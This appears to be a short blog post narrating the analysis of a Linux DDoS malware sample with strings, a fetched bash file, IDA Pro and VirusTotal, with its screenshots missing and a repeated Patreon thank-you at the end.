We will start here:
As you can see malware is 'still online' (30.04.2020) so please be careful:
I started from strings on my Kali VM. As you can see there is (again) a 'link to download'. So I grabbed the bash-file:
Content of the file looks pretty familiar, isn't it? ;)
Initial checking of the hosting server:
I opened binary in IdaPro:
Now we can see that there are very similar function(s) to the list we found in previous cases(1, 2):
Even the Graph overwiev looks similar ;) Ok, strings, strings and more strings... Here we go:
Interesting - checking:
File again is trying to download a copy of the malware. I googled for the strings found inside the binary and this is what I found:
It looks like some old campaign (2018-19) is started and alive again ;) Few more similarities from strings:
I think it's time to check the link mentioned on the page - VirusTotal:
Looks like the same kind of a ddos tool. ;]
I hope you found it useful. In case of any question(s) - you know how to find me.
Special thanks goes to my new Patreons:
- Daniel
- julianvolodia
Thank you! You are AWSOME! ;)
See you next time!
Cheers
Special thanks goes to my new Patreons:
- Daniel
- julianvolodia
Thank you! You are AWSOME! ;)
See you next time!
Cheers
Brak komentarzy:
Prześlij komentarz